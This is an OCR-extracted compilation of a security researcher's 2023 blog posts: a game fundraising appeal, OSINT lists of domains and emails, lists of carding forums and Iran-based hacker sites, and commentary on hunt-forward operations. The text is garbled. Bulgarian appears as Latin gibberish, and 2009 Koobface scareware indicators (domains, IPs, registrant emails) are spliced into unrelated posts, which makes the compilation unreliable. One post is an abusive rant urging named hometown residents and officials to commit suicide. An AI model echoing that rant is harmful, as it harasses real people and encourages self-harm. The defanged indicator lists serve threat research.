pa3y3HaBaHeTO Ha 3amsaxu? 


* OCHOBUTE Ha CTapTUPaHeTO, NOAAbPKAHETO U YNPABJIEHNETO Ha NPOrpaMa 3a pa3y3HaBaHe 
Ha 3anslaxu B UANATA KOMNAHUA 3a HAYWNHAeCLLU 


« Kak ga o6yuute BAaLUUTE AHAJIUZATOPU 3a Pa3Y3HABAHE Ha 3anNaxu fla ObaaT pOK 3Be34uU 
Ha UHAYCTPUATA 3a CUFYPHOCT U AHANIUTUYHUTE VU TEXHUYECKU POK 3Be3 qu? 


Sample video demonstration of Dancho Danchev’s OSINT and Threat Intelligence training in 
Bulgarian: 
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Dancho Danchev 

Independent Contractor 
https:/ddanchey. blogspot.com 
Email: dancho.danchev@hush.com 
+359876893890 


In case you’re interested in inquiring about individual or group OSINT or threat intelligence 
training for you or for your team feel free to drop me a line at dancho.danchev@hush.com 


cho_Danchev_Cyber_Security_Talks_Bulgaria_2022_Video_Pre 
9. https: //archive. org/details/rsa-europe-presentation-01 


10. https://archive.org/details/dancho-danchev-whois-xml-api-maltego-bulletproof-infrastructure-2 


19.7 July 


19.7.1 Upcoming Release of a Biographical Cyber Security Visual Novel Game - Who 
Wants to Donate? (2023-07-07 18:55) 


[1] 
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Donate BiCoia: LOE Wmk77omKtVeqrkDphviNJpovh2 Ksi7x 
Download for Windows | Downlead for Linux | Dowsload for Mac OS X| Download for Android | Downlead for KS | Dewnlead for PS4 | Download for PSS | Downlead for wOS 


Play Online with WebGL 
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Dear blog readers, 


Happy summer or even better said how’s the summer in the context of having me announce 
my summer project which is basically a biographical Visual Novel game on which I’m working 
using Unity and Articy where the ultimate goal would be to present my story as a teenage 
hacker enthusiast throughout the 90’s up to present day where I’m a cybercrime researcher 
security blogger OSINT analyst and threat intelligence analyst which will consist of real-world 
people friends and colleagues from my online experience including colleagues and friends from 
the industry where my main goal would be to make this an unforgettable and educational and 
also mind and spirit provoking experience for everyone that I’ve work with online throughout 
the years. 


[2] 
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Special thanks to [3]Elitecy Stuart for the hard work. 


Here’s a teaser: 


"Cybercrime World Computer Game is an innovative and cutting-edge game that immerses 
players into the complex and dynamic world of cybercrimes. With its highly realistic graph- 
ics and intricate gameplay mechanics, this game provides a unique and informative expe- 
rience for individuals seeking to understand the inner workings of cybercriminal activities. 
Through a series of challenging missions and scenarios, players are given the opportunity to 
navigate through virtual environments, uncover vulnerabilities, execute sophisticated hacking 
techniques, and ultimately defend against potential cyber threats. The game offers a com- 
prehensive insight into various aspects of cybercrimes like identity theft, social engineering, 
malware attacks, and data breaches. In addition to its entertainment value, Cybercrime World 
Computer Game also serves as an effective educational tool, fostering awareness about online 
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security practices and equipping players with the knowledge required to protect themselves 
from real-world cyber threats. With its flawless execution and compelling narrative structure, 
this game sets a new standard for the intersection between gaming and cybersecurity aware- 
ness. A computer game about Dancho Danchev’s biography would offer an interactive and 
immersive experience, presenting players with the opportunity to explore the fascinating life 
of this renowned cybersecurity expert. Drawing from real-life events, the game could start by 
introducing players to Danchev’s early years, highlighting his passion for technology and his 
pivotal role in combating cybercrime. Through captivating storytelling and gameplay mechan- 
ics, players would navigate a series of levels inspired by significant milestones in Danchev’s 
life. They would encounter challenges that mirror his professional struggles, such as dissecting 
complex malware attacks or uncovering sophisticated hacking techniques. 


The game could also shed light on his relentless commitment to internet safety and empha- 
size his active involvement in global cybersecurity initiatives. By creating a dynamic narrative 
centered around real-world accomplishments, this computer game would not only entertain 
players but also educate them about the crucial work of cybersecurity professionals like Dan- 
cho Danchev. The Cybercrime World Visual Novel Game is a captivating and thrilling gaming 
experience set in the dark underbelly of the digital world. This interactive story-driven game 
immerses players in a gripping narrative centered around cybercrime activities, where they 
assume the role of an aspiring hacker seeking fame and fortune within this clandestine world. 
The game’s stunning visuals and realistic depiction of hacking techniques enhance the overall 
gaming experience, providing players with an authentic glimpse into the intricacies of cyber- 
criminal operations. With its meticulously crafted storyline filled with unexpected plot twists 
and suspenseful moments, players will find themselves engrossed in a world full of danger and 
deceit. Moreover, the game encourages critical thinking and problem-solving skills as players 
navigate through intricate puzzles, bypass security systems, and outsmart rivals to ultimately 
emerge as a renowned "cyberlord." Undoubtedly, this innovative visual novel is poised to cap- 
tivate gamers who seek intrigue, challenge, and an immersive exploration into the realm of 
cybercrimes. 


A visual novel computer game about hackers combines the immersive storytelling of visual 
novels with the intriguing world of cybersecurity, offering players a unique and engaging 
experience. This genre not only delves into the technical aspects but also explores ethical 
implications and personal dilemmas faced by hackers. Through thoughtfully designed nar- 
ratives, players are able to grasp complex hacking techniques, learn about digital security 
practices, and gain insights into the motives driving these characters. The game’s attention 
to detail and realistic portrayal of hacking activities allows players to navigate through a wide 
range of scenarios, from infiltrating high-security systems to unraveling intricate conspiracies. 
Moreover, this game can serve as an educational tool, promoting a broader understanding of 
cybersecurity concepts while entertaining gamers with its captivating plotlines. Ultimately, a 
visual novel computer game about hackers offers a professional yet thrilling experience for 
both technology enthusiasts and those seeking to expand their knowledge in this ever-evolving 
field." 


Sample screenshots include: 


[4] 
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ebeoxuw .cn - Email: spscript@hotmail.com 
eqidax .cn - Email: spscript@hotmail.com 
evaolux .cn - Email: spscript@hotmail.com 
cafropy .cn - Email: spscript@hotmail.com 
etyupy .cn - Email: spscript@hotmail.com 
kebquty .cn - Email: spscript@hotmail.com 
cakevy .cn - Email: spscript@hotmail.com 
eqouwy .cn - Email: spscript@hotmail.com 
epuvyiz .cn - Email: spscript@hotmail.com 


UPDATED - Monday, November 16, 2009: The Koobface gang is pushing [6]a new up- 
date, followed by a new portfolio of scareware redirectors and actual scareware serving 
domains. 


New portfolio of redirectors parked at [7]91.213.126.250: 
befree2 .cn - Email: gmk2000@yahoo.com 
scandinavianmall .cn - Email: admin@calen.be 
densityoze .cn - Email: admin@calen.be 
moored2009 .cn - Email: cael@newstile.it 
pica-pica .cn - Email: cael@newstile. it 
stroboscopicmovie .cn - Email: cael@newstile. it 
comedienne .cn - Email: admin@calen.be 
densityoze .cn - Email: admin@calen.be 
furorcorner .cn - Email: cael@newstile. it 
ionisationtools .cn - Email: guzimi@brendymail.de 
wax-max .cn - Email: cael@newstile.it 
plate-tracery .cn - Email: guzimi@brendymail.de 
little-bitty .cn - Email: admin@calen.be 
night-whale .cn - Email: admin@calen.be 
scary-scary .cn - Email: gmk2000@yahoo.com 


Second redirectors portfolio at [8]91.213.126.102: 
disorganization000 .cn - Email: guzimi@brendymail.de 
rainbowlike .cn - Email: HuiYingTsui@airways.au 
skewercall .cn - Email: HuiYingTsui@airways.au 
wegenerinfo .cn - Email: guzimi@brendymail.de 
kangaroocar .cn - Email: HuiYingTsui@airways.au 
pericallis .cn - Email: HuiYingTsui@airways.au 
treasure-planet .cn - Email: guzimi@brendymail.de 
genusbiz .cn - Email: HuiYingTsSui@airways.au 


Currently [9]pushing scareware from- primescanl .com = ~-_ [10]83.133.124.149; 
[11]91.213.126.103; [12]83.133.119.84; [13]85.12.24.13. [14]Sampled scareware phones 
[15]back to windowsupdate8 .com/download/timesroman.tif - 88.198.105.145 and angle- 
meter .com/?b=1 (safewebnetwork .com) - 92.48.119.36. 


More scareware domains are parked on the same IPs: 

yourantivira7 .com - Email: j.wirth@smsdetective.com - [16]detection rate 
web-scanm .com - Email: essi@calinsella.eu - [17]detection rate 

yourantivira3 .com (wwwsecurescanal .com) - Email: j.wirth@smsdetective.com 
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So here’s the news? Who wants to sponsor me for this project and for its release in a timely 
manner preferably before the end of the summer? It would be really great if you’re an orga- 
nization or a vendor where I’m full of ideas in terms of how | can give proper credit for your 
donation or sponsorship. 


Drop me a line at dancho.danchev@hush.com in case you’re interested in sponsoring my 
project or in case you might have any ideas on terms of how you can contribute here such 
as for instance a Unity developer or a game Script writer. 


Stay tuned! 


1. https://blogger .googleusercontent .com/img/b/R29VZ2x1/AVVXsEjtW3Wcct QdfQakKCPseolq9gYOmiFNCBmRAQF qOD4BF JXPvg 
Etn5PdYU2_F5ZZCAR_ZjszfTUrzEQXZp5L7Gz0a8B01115r4zuxF 3W 

2. https://blogger. googleusercontent .com/img/a/AVvXsEhtXfij_stSQb8pjazdMtCsMs-9J2Y_vuiXmviaUaBuJfXG-IHf0Pfewl 
x0x5AJ73uRBBdMgJzyR40ySdYQM-SetGobCo_jPeRTbK80jqL5znxQ 

3. https: //www.facebook.com/profile. php?id=100088482332570 

4. https: //blogger .googleusercontent .com/img/b/R29VZ2x1/AVvXsEi7x1Mxg j82XpVodfHYmTZjv6Lwg276zYhps3WL8t16SsASF 
huvRiagbjfxeGI JCGyiNacAAYOv5DQnpvCWOODIt 3KeEXiVD4G0pjH 

5. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEjI-n1z610DUYLjxLiAf2SWWEbmmIXFcd11cZ10zp7naziSq 
tanJ-e6F jOASbJs9i59F8sVa4qSzhJ258ITEx0JxsEScO1Jj jmhQPD 

6. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEilw0u2gy4GbVEf 1G2GYqtNShzURI j jR7ORBKFSVM1913bUh 
yKIetF1ldVMoqlq_yKy08DAoqiN7H4B_3d3H9C4731_Wjn6oBN40kKFa 

7. https: //blogger .googleusercontent .com/img/b/R29VZ2x1/AVvXsEjrgxvNOBDNhwstvzfxsBOW9101xi4wQDxiZ4r6Q0-u1qc02 
4WkZazHOgtL4i9s2xhulLfk1DOWdQqBhyZXIgjxLLz5Lo1QusrcmbU 
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19.7.2 Who’s on Wikipedia? (2023-07-20 11:00) 


Dear blog readers, 
Who’s on Wikipedia is an Editor or can forward [1]this to their friends on Wikipedia? 


[2] 


It’s a [3]Draft about me and my experience in the field which you can assist in Editing and 
contributing to using a set of [4]links and resources which I’ve prepared including to assist in 
adding references from [5]Google Books and [6]Google Scholar. 


Stay tuned. 


1. https://en.wikipedia.org/wiki/Draft:Dancho_Danche 
2. https: //blogger . googleusercontent . com/img/a/AVvXsEiuVkg01iMaleo9hfGC0jS3rFRXh88c18-LWmFieY1J687BEyaSVX65wE 
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4Wf YMA8DQmx-uPgHupT JriFgZLkOThLZHWj ypMAauhJi7KML7jSOkC 

3. https://en.wikipedia.org/wiki/Draft :Dancho_Danchev 

4. https://drive.google.com/file/d/1a9_OsaA0jLkzMotmATemMvUagYPoBYuk/view?usp=drivesdk 

5. https://www. google .com/search?tbm=bkskq=/2522dancho+danchev/,2522 

6. https://scholar.google.com/scholar?hl=enkas_sdt=0%252C5&q=7,2522dancho+danchev/2522&btnG=kog= 


19.7.3 Exposing the Internet-Connected Infrastructure of FBI’s Most Wanted Igor 
Dehtyarchuk - "Floraby" - An OSINT Analysis (2023-07-25 13:54) 


[1] 


Ll = 
'*? 


| age 
| ae 


Dear blog readers, 


I’ve decided to share some actionable intelligence on the Internet-connected infrastructure of 
FBI’s Most Wanted - [2]lgor Dehtyarchuk - "Floraby" with the idea to assist everyone doing 
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research on the topic including U.S Law Enforcement on its way to track down and monitor this 
individual and his associated Internet-connected properties. 


Sample emails known to have been involved in the campaign include: 


abuse@shopsn.su 
dimetr801@mail.ru 
admin@4server.su 
ssg.apple77@gmail.com 


Sample domains known to have been involved in the campaign include: 


A4server.su 
csgoacc.ru 
marketsales.su 
Zarmo.sSu 
4domains.su 
ebayshop.su 
globus-base.su 
broshop.su 
deer.su 
shopsn.su 
cjmarket.net 
vkaccounts.com 
cheapaccounts.su 
ytuber.su 
vds4u.su 
4host.su 
tgshop.su 
xn-227-qdd4dec.xn-placf 
4dedic.su 
time-hack.su 
4ns.su 


Sample screenshot: 


[3] 
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® © © ®© © 


4server.su esgoacc.ru matketsales.su Zarmo.su 4domains.su 


© © © © © 


ebayshop.su globus-base.su broshop.su deersu shopsn.su 


© © © @ @ 


cjmatket.net vkaccounts.com cheapaccounts.su ytubersu vds4u.su 


a re Zan ro a“? 
® ® & @© ®@ 
4host.su tgshop.su 4ns.su 4dedic.su time-hack.su 


Stay tuned! 


1. ftapa;/ blogger. googleusercontent.con/ing/b/R20v22x1/AVWHaE jaGullPxiQrktTOGAUOJ0qLEDyRoNEpIQV2I¥RHLVEDE5]8 
2. heeps://wuy. fbi. gov/anted/ cyber/ igor dele yarchul 
3, https: / blogger googleusercontent.con/ing/>/K20vZ2x1/AWHsBi95_bulKZAqBDt vioTBiLASyXRsLOKEGOvAy4AGrCtrOhTo 


19.7.4 Dancho Danchev’s Disappearance - 2010 - Official Complaint Against Re- 
public of Bulgaria Regarding Dancho Danchev’s Illegal Law Enforcement Ar- 
rest Home Molestation and Kidnapping Attempt - A Compilation - Part Two 
(2023-07-27 22:22) 


[2]Define: peasant forgetting the true reality of non-existence in the universal wannabe 
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agricultural economy referred to as the very bottom of Eastern Europe. 


The following is yet another official complaint part of the compilation of official complaints for 
the exact same people that kidnapped me from my place back in 2010 with my stolen ID which 
resulted in illegal detention for four months without anyone knowing and without any sort of 
explanation up to present day for which | warned in advance and $85,000 later which | legally 
earned and lost due to home molestation and on purpose drug poisoning courtesy of Bulgaria’s 
DANS agency in combination with local peasants and savages from Bulgarian Law Enforcement 
from the city of Troyan, Bulgaria which is my hometown. 


Whether it’s through modest complaints or through other means | promise that | will do my 
best to shed more light and continue elaborating more on this case from Bulgaria and three 
and five years and $85,000 legally earned and lost due to on purpose poisoning through other 
means other than this case of supreme idiocity and easy to detect and spot local degree of 
idiocity and peasant-eria with no explanation up to present day. 


Is it a bottom is it a bottom line or is it the bottom line in the very bottom line of yours? | 
promise that I’ll soon take the time and effort and elaborate in-depth on the degree of savagery 
and moronic - apologies there’s no such word when it comes to my hometown - peasantaria 
and idiocy of the people living in my hometown Troyan, Bulgaria including the very bottom of 
what’s invisible to others in the true spirit of what some others would describe as something 
that | won’t tell you which is guess what - it’s the very bottom of Eastern Europe. 


Whether it’s behold yourself to the almighty savior I’m not your savior or behold your almighty 
savior person and the very bottom of the dipshits that "make it happen" at their place every 
night are going to truly regret it using legal means or at the end we are going to find you a 
decent place buy it so that you can rent it and eventually for the blessing of everyone that truly 
knows you commit suicide in the true spirit of spending the irrelevance of your existence where 
it belongs in the place that we bought and that you rented and where you committed suicide 
or in the other place where all of your relatives belong. | won’t say but the very smells of your 
enticing existence tends to point to everyone’s favorite place for Bulgarian lifestyle dipshits 
and irrelevant to the universal irrelevance of your existence place. Guess what? That’s not my 
place. 


1. https: //blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEj Jz1WJFOzZDCLHoaMCxMQf Yk3k0Zs6wpANUraAyMuorPU8js 
pRduooce7i-fbS11-9hTW_3ejqcKxFsBxnIteiukPqfFW7SfA615a_ 
2. https: //www.google.com/search?q=define/3Apeasant 


19.7.5 Cyber Intelligence - Second Edition - Released (2023-07-31 01:55) 


[1] 
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The Ultimate 
Ever-Green Second 
EqGition~omDanehno 
LDanchevs Cyber 
Intelligence Memoir 


‘Learn the True Story of The 
Cybercrime Underworld and 
How We Set Up the 
Foundations of the Threat 
Intelligence Marketplace’ 


Grab a [2]PDF or [3]ePub copy from [4]here including the full archive [5]here today. 


Stay tuned! 


1. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEj jBkGifzLAIdPVMQu3iEqt1p21XSc40B1PWAeUj vc5dSkdm 
8 JbnW1pYOcZGHGePoiLR_AwTPqLr3scpDy0IdFPR2EcwKn8RtY1-C 
2 


https: //archive.org/download/dancho-danchev-cyber-intelligence-cybercrime-memoir-second-edition-2023/Dan 


ho_Danchev_Cyber_Intelligence_Cybercrime_Memoir_Second 


3. https://archive.org/download/dancho-danchev-cyber-intelligence-cybercrime-memoir-second-edition-2023/Dan 


ho_Danchev_Cyber_Intelligence_Cybercrime_Memoir_Second 


4. https: //archive.org/details/dancho-danchev-cyber- intelligence-cybercrime-memoir-second-edition-202 


5. https://archive.org/details/dancho-danchev-cyber-intelligence-cybercrime-memoir-second-edition-202 
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19.8 August 


19.8.1 Embassy of China in Canada Issues a Statement on U.S Cyber Espionage Cam- 
paigns Against Japan (2023-08-11 21:00) 


[1] 


WEARS Me Kin - We 


EMBASSY OF THE PEOPLE'S REPUBLIC OF CHINA IN CANADA 


| just came across to a statement issued by the Embassy of China in Canada on the [2]U.S 
cyber espionage campaigns launched against Japan. 


What’s so special about this statement? First it does quite Wikileaks which is a bit of an 
outdated approach including the actual source to shed more light into a bigger problem and 
issue for China that the press statement on the Web site of the Chinese Embassy in Canada 
mentions. In this specific case the statement implies the use of the so called "hunt-forward" 
missions which could really mean big trouble for China if the U.S somehow manages to secure 
a deal with a neighbouring country next to China which could really mean big trouble for 
China as the U.S will then attempt to establish the foundation for a successful cyber attacks 
and possibly information operations interception campaigns used managed and operated by 
China including its partners and allies where to ultimate goal would be to measure their true 
capabilities and set the foundation for a successful cyber situational awareness campaign in 
terms of cyber attacks and the true state of China’s true cyberspace operations and cyber 
attack capabilities including the capabilities of some of its neighbouring countries. 


The so called [3]Hunt Forward Operations also known as (HFOs) are an early warning system 
for cyber situational awareness that could improve the true state of the visibility of the actual 
country that’s doing these missions in this specific case the U.S could really learn a lot about 
new tactics and techniques courtesy of the attackers based in the specific country where it’s 
hosting its mission which could be really bad news for China in terms of having the U.S deploy 
hunt forward missions in its neighbouring countries where the U.S could really get a better 
picture of China’s understanding and actual applicability of basic cyber warfare principles and 
concepts in action including the "know-how" of its neighbouring countries. 


Despite the fact that the U.S is willing to share its knowledge and understanding of cyber 
attacks "Know-how" with the host country of a hunt forward mission it could also learn a lot 
about the cyber attacks that originate from the host country and possibly improve its own 
situational awareness in the field including from a geographical perspective. 


Happy hunting. 


1. https: //blogger . googleusercontent .com/img/b/R29vZ2x1/AVVXsEjhtnFi-vJBN_HNbHOS5Z82cJGUUDkLbHykIhAFaDGOh5zK 
KZP415WJhemgzLA-yo2YzcyvY6r0m_NEwN1DPQO2eacChEtBSSwaxk 
2. http://ca.china-embassy.gov.cn/eng/fyrth/202308/t20230810_11125180.htm 


3. https: //www.cybercom.mil/Media/News/Article/3218642/cyber-101-hunt-forward-operations/ 
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19.8.2 A Portfolio of Publicly Accessible Cybercrime Friendly Forum Communities 
(2023-08-11 21:01) 


[1] 


Installs 


We selling high-quality installs, loads, download to bots, rats, stealers... All *.EXE allowed, just be fud. Fresh bots come every day 


E-wedmoney Agtiverty Ebijtcoin 


Who needs access to a recently collected portfolio of publicly accessible cybercrime friendly 
forum communities for Technical Collection and situational awareness? 


| recently spend some time doing my homework on the topic in terms of improving my Cyber- 
crime Forum Data Set and | decided to share the findings with everyone. 


Sample publicly accessible cybercrime-friendly forum communities include: 
hxxp://crdforum.cc/ 
hxxp://darkwebmafias.net/ 
hxxp://darkstash.com/ 
hxxp://crdpro.cc/ 
hxxp://www.cardingclub.net/ 
hxxp://www.russiancarders.se/ 
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hxxp://validmarket.io/ 
hxxp://cardingforum.cx/ 
hxxp://carding.sh/ 
hxxp://bitcarder.com 
hxxp://cardingleaks.ws/ 
hxxp://www.verifiedcarder.net/ 
hxxp://www.legitcarder.ru/ 
hxxp://www.crdworld.com/ 
hxxp://cardingmafia.to/ 
hxxp://cardingforum.cx 
hxxp://crdforum.cc 
hxxp://darkstash.com 
hxxp://carders.biz 
hxxp://crdpro.cc 
hxxp://carders.mx 
hxxp://carding-forum.com 
hxxp://crdclub.su 
hxxp://procrd.pw 
hxxp://cardmafia.cc 
hxxp://cardingforum.info 
hxxp://cardingleaks.ws 
hxxp://darkpro.net 
hxxp://crackingforum.to 
hxxp://cardingworld.ru 
hxxp://darkwebmafias.ws 
hxxp://leetforums.ru 
hxxp://legitcarders.ws 
hxxp://crdcrew.cc 
hxxp://prtship.pro 
hxxp://verifiedcarder.net 
hxxp://legitcarder.ru 
hxxp://carders.zone 
hxxp://drdark.ru 
hxxp://darknetweb.ru 
hxxp://bpcforum.ru 
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primescan8 .com 

online-check-v11 .com 

antivir-scanl1 .com - Email: contact@armadastate.us 
antispy-scan1 .com - Email: contact@armadastate.us 
primescanl1 .com 

checkforspyware2 .com - Email: admin@calen.be 
pc-antispyware3 .com - Email: contact@spaintours.com 
premium-protection6 .com - Email: contact@spaintours.com 
antivir7 .com - Email: admin@maternitycloth.eu 
online-check-v7 .com 

beprotected8 .com - Email: admin@maternitycloth.eu 
pc-antispyware9 .com - Email: contact@spaintours.com 
online-check-v9 .com 

checkfileshere .com - Email: admin@calen.be 
scanfileshere .com - Email: admin@calen.be 
antivir-scano .com - Email: contact@armadastate.us 
check-files-now .com - Email: admin@calen.be 
antivir-scanz .com - Email: contact@armadastate.us 
antispy-scanz .com - Email: contact@armadastate.us 


ISP’s contributing the the monetization of Koobface have been notified. 


UPDATE: 91.212.107.103 has been taken offline courtesy of Blue Square Data Group Services 
Limited - [18]previous cooperation took place within a 3 hour period - with the Koobface gang 
migrating scareware operations to 93.174.95.191 (AS29073 ECATEL-AS , Ecatel Network) and 
188.40.52.181; 188.40.52.180 - (AS24940, HETZNER-AS Hetzner Online AG RZ) - ISPs have 
been notified. 


The .info scareware domain portfolio will be suspended within the next 24 hours. 


[19]Ali Baba and the 40 thieves LLC a.k.a [20]my Ukrainian "fan club", the one with the 
[21]Bahama botnet connection, the [22]recent malvertising attacks connection, and the 
current market leader of [23]black hat search engine optimization campaigns, has been 
keeping themselves busy over the past couple of weeks, continuing to add additional layers 
of legitimacy into their campaigns (bit.ly redirectors to blogspot.com accounts leading to 
compromised hosts), proving that if a cybercrime enterprise wants to, it can run its malicious 
operations on the shoulders of legitimate service providers using them as "virtual human 
shield" in order to continue its operations without fear of retribution. 


¢ Go through [24]Koobface Botnet’s Scareware Business Model - Part One 


Over the past two weeks, the Koobface gang once again indicated that it reads my blog, 
"appreciates" the ways | undermine the monetization element of their campaigns, and next 
to [25]redirecting Facebook’s entire IP space to my blog, they’ve also, for the first time ever, 
[26]moved from using my name in their redirectors, to typosquatting it. 
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hxxp://wc-club.com 
hxxp://cybercarders.com 
hxxp://bitorder.pw 
hxxp://cardingforum.cx/ 
hxxp://crdpro.cc/ 
hxxp://darkpro.net/ 
hxxp://deeptor.ws/ 
hxxp://www.verifiedcarder.net/ 
hxxp://crdforum.cc/ 
hxxp://crdcrew.cc/ 
hxxp://legitcarder.ru/ 
hxxp://blackhatcarding.is/ 
hxxp://legitcarders.ws/ 
hxxp://leetforums.ru/ 
hxxp://deepwebforum.net/ 
hxxp://darkwebmafias.ws/ 
hxxp://crdclub.su/ 
hxxp://www.cardingworld.ru/ 
hxxp://russiancarder.net/ 
hxxp://underworldmafias.net/ 
http://www.cardersteam.com 
hxxp://carding.work/ 
hxxp://cybercarders.com/ 
hxxp://blacknetworld.com/ 
http://carding.pw/ 
hxxp://carders. biz/ 
hxxp://verified.international/ 
hxxp://cardingfree.com/ 
hxxp://drdark.ru/ 
hxxp://shadowcarders.com/ 
hxxp://cardingstuff.ws/ 
hxxp://carders-club.com/ 
hxxp://sky-fraud.net/ 
hxxp://darkteam.su/ 


hxxp://trustedsellers.ws/ 
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hxxp://bitorder. pw/ 
hxxp://www.legitmafia.ws 
hxxp://carding.pw/ 
hxxp://cardingleaks.ws/ 
hxxp://darkstash.com/ 
hxxp://www.deepwebforum.net/ 
hxxp://legitmafia.ws 
hxxp://carders.mx/ 
hxxp://cardingforums.org 
hxxp://procrd.pw/ 
hxxp://cardvilla.cc/ 
hxxp://cardingclub.ws/ 
http://www.cardersteam.com/ 
hxxp://darkpro.net 
hxxp://carders.zone/ 
hxxp://www.prtship.pro/ 
hxxp://carding-forum.com/ 
hxxp://cardmafia.cc/ 
hxxp://cardingforum.info 
hxxp://crackingforum.to/ 
hxxp://prtship.pro/ 
hxxp://darknetweb.ru/ 
hxxp://www.bpcforum.ru/ 
hxxp://wce-club.com/ 


Happy Technical Collection. 


1. https: //blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEgXLequAvEhoNXtHwGc_x5YDbr280wdpBZqDPsnXGo6F AHK 
TyqYK20rUWGmF76S3sdQQwhJ8aSu-1xbN1BL_NzwnbbocMUaW1Pgkj 


19.8.3 A Portfolio of Iran-Based Hacker Groups and Lone Iran-based Hackers Per- 
sonal Web Sites (2023-08-11 21:01) 


[1] 
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Dancho Danchev Presents! Brace Yourselves! 


Grab today a free co 
Exposing Iran's Hac 
Technica § 
Priced at $5 


ppraach yo r Manager today! Empower your Threat 
intelligence Team! An USINT Conducted Today is a 
Tax Payers Dollar Saved Tomorrow! 


Commercial Copy naee today roach me toda 


https://ddanchev.blogspot.com 
Official OSINT Report Price - $500 


Technical Collection Data - Exclusive Email: dancho.danchev@hush.com 
Copy Available! 


In need of a freshly collected Iran-based hacker groups and lone hacker personal Web sites? 


As | did some homework on the topic of finding these | actually came across to the fact that 
the majority of these are located on an Iran-based hosting provider known as Persiangig.com 
and as I’ve decided to dig a little bit deeper | came across to and actually bothered to compile 
a portfolio of these Web sites which | decided to share with everyone ready here. 


Sample Iran-based hacker groups and lone hacker personal Web sites include: 
hxxp://adibii.persiangig.com/ 
hxxp://ahm4d-h4cker.persiangig.com/ 
hxxp://ahmadbady.persiangig.com/ 
hxxp://alipcl.persiangig.com/ 
hxxp://alireza5800.persiangig.com/ 
hxxp://anatema.persiangig.com/ 
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hxxp://anax2x.persiangig.com/ 
hxxp://any-thing.persiangig.com/ 
hxxp://artacyber.persiangig.com/ 
hxxp://arvineasthackers.persiangig.com/ 
hxxp://aware.persiangig.com/ 
hxxp://azazel.persiangig.com/ 
hxxp://barfobaran.persiangig.com/ 
hxxp://bigb4ng.persiangig.com/ 
hxxp://bl4ck-hat.persiangig.com/ 
hxxp://blackfox.persiangig.com/ 
hxxp://blackice.persiangig.com/ 
hxxp://bulurp.persiangig.com/ 
hxxp://cdn.persiangig.com/ 
hxxp://cld.persiangig.com/ 
hxxp://cr4zylov3r.persiangig.com/ 
hxxp://danial-secret.persiangig.com/ 
hxxp://drtrojan.persiangig.com/ 
hxxp://drwxrwxrwx.persiangig.com/ 
hxxp://ehsan-empire.persiangig.com/ 
hxxp://eshak.persiangig.com/ 
hxxp://farbodmahini.persiangig.com/ 
hxxp://freezer.persiangig.com/ 
hxxp://fun4ir.persiangig.com/ 
hxxp://g3n3rall-blackhat.persiangig.com/ 
hxxp://goodboy3113.persiangig.com/ 
hxxp://h3ktOrz.persiangig.com/ 
hxxp://h4med.persiangig.com/ 
hxxp://hashorblackhat.persiangig.com/ 
hxxp://nesam1955.persiangig.com/ 
hxxp://highersense.persiangig.com/ 
hxxp://hivO1.persiangig.com/ 
hxxp://hkhmerikhi.persiangig.com/ 
hxxp://hushy.persiangig.com/ 
hxxp://i3lue.persiangig.com/ 
hxxp://inf3cted.persiangig.com/ 
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hxxp://infohooman.persiangig.com/ 
hxxp://irsec.persiangig.com/ 
hxxp://java-mesh.persiangig.com/ 
hxxp://jimunix.persiangig.com/ 
hxxp://Karaji21.persiangig.com/ 
hxxp://kazemfdisk.persiangig.com/ 
hxxp://keent.persiangig.com/ 
hxxp://kingq8.persiangig.com/ 
hxxp://lahij.persiangig.com/ 
hxxp://lamon.persiangig.com/ 
hxxp://li-tex5.persiangig.com/ 
hxxp://lo0ord.persiangig.com/ 
hxxp://lordnitro.persiangig.com/ 
hxxp://Ilvl3hr.persiangig.com/ 
hxxp://m4hd1.persiangig.com/ 
hxxp://mahdi45.persiangig.com/ 
hxxp://mamd00.persiangig.com/ 
hxxp://matinO21.persiangig.com/ 
hxxp://medl01.persiangig.com/ 
hxxp://mefile.persiangig.com/ 
hxxp://mehdi456.persiangig.com/ 
hxxp://mehdy007.persiangig.com/ 
hxxp://mehran4u.persiangig.com/ 
hxxp://motakhases.persiangig.com/ 
hxxp://mr-bami.persiangig.com/ 
hxxp://mr-emiter. persiangig.com/ 
hxxp://mrzero.persiangig.com/ 
hxxp://Mx7xx.persiangig.com/ 
hxxp://noter.persiangig.com/ 
hxxp://omid3r.persiangig.com/ 
hxxp://optishock.persiangig.com/ 
hxxp://ra-ha.persiangig.com/ 
hxxp://rad1c4l.persiangig.com/ 
hxxp://rebell. persiangig.com/ 


hxxp://rking.persiangig.com/ 
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hxxp://s2z2m.persiangig.com/ 
hxxp://saeed-00x.persiangig.com/ 
hxxp://saiedsoft. persiangig.com/ 
hxxp://security-team.persiangig.com/ 
hxxp://sitl1.persiangig.com/ 
hxxp://spacktOre. persiangig.com/ 
hxxp://thr3at.persiangig.com/ 
hxxp://titaksecteam.persiangig.com/ 
hxxp://vampire-diaries.persiangig.com/ 
hxxp://veron.persiangig.com/ 
hxxp://virtualuniversityofshiraz.persiangig.com/ 
hxxp://virus45.persiangig.com/ 
hxxp://w00rm.persiangig.com/ 
hxxp://w3bbaz.persiangig.com/ 
hxxp://wanted1.persiangig.com/ 
hxxp://wantedst.persiangig.com/ 
hxxp://webzzz.persiangig.com/ 
hxxp://aamahmoodi.persiangig.com/ 
hxxp://abiposhan.persiangig.com/ 
hxxp://adonia.persiangig.com/ 
hxxp://ahmadgeo.persiangig.com/ 
hxxp://ahwazdownload.persiangig.com/ 
hxxp://armaninvisible.persiangig.com/ 
hxxp://armintanha.persiangig.com/ 
hxxp://azuitsociety. persiangig.com/ 
hxxp://backpacker.persiangig.com/ 
hxxp://barzan.persiangig.com/ 
hxxp://bergissub.persiangig.com/ 
hxxp://bl4cklOrd.persiangig.com/ 
hxxp://capitanmsf.persiangig.com/ 
hxxp://countalireza.persiangig.com/ 
hxxp://dade1496.persiangig.com/ 
hxxp://defcon.persiangig.com/ 
hxxp://devilinside.persiangig.com/ 
hxxp://diazpame10.persiangig.com/ 
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hxxp://djmehrab.persiangig.com/ 
hxxp://dl-myismailyk.persiangig.com/ 
hxxp://dondiego.persiangig.com/ 
hxxp://emperor.persiangig.com/ 
hxxp://eshraq.persiangig.com/ 
hxxp://essaji.persiangig.com/ 
hxxp://ezdaha.persiangig.com/ 
hxxp://ferancesco.persiangig.com/ 
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System Tasks 


(2) View system information 


